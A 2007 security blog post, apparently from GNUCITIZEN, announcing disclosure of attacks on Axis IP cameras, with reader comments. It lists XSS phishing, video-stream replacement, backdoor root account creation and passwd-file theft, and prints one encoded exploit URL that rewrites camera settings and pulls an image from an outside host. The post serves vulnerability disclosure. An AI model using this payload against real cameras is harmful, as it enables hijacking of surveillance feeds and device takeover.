Owning Big Brother - Hollywood-style Exploits Included!

Fri, 28 Sep 2007 18:43:14 GMT

I've done some research on Axis IP cameras, which now I am able to disclose to you and reveal some of the magic. Although this is not independent research, I am mentioning it here as it may interest some.

The research is made of two components: a purple paper (one of the traditions we follow in GNUCITIZEN) and a video. I promise you that I won't bore you with PoCs, but actual Hollywood-style exploits. This includes the classic attack in which the legitimate video stream gets replaced by another stream that keeps looping forever (remember Speed)). We even created a demo video of this attack! Blame Major Malfunction (soon to be featured) for this, as he suggested the third-party-video infinite loop technique.

Here are some of the juicy bits, mentioned in the paper:

  • Cross-browser XSS phishing
  • Replacing the legitimate video stream with our own
  • Adding a Backdoor Root Account
  • Stealing the 'passwd' File

Here is an example of an exploit that we've come up with. You don't know what it is doing? Well, read the paper for more details:

http://target/%3cscript%20src=%22/this_server/ServerManager.sr
v%3fconf_Layout_TitleEnabled=yes&Layout_TitleEnabled=on&conf_L
ayout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3cimg%20src=ht
tp://snipu.com/f1%3e%3c!--
&servermanager_do=set_variables%22%3e%3c/script%3e%3c!--
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
FredFred
Wow so in your previous article you recommend "do not open any PDFs locally or remotely" and now you release a PDF showing "wonderful" exploits.... I'm not going to fall for that!
pdppdp
Fred, this post is from AP...
Adrian PastorAdrian Pastor
He he! the PDF hack is pdp's work, so don't blame me!! Hilarious post nevertheless.
hackathologyhackathology
Nice article with great examples.
Adrian PastorAdrian Pastor
A few people have been asking me if the video stream could be hijacked without tricking the admin to visit a third-party site. I made a new video where the victim admin is NOT required to visit a third-party site but rather check the camera's logs page:
pdppdp
Impressive work, again :)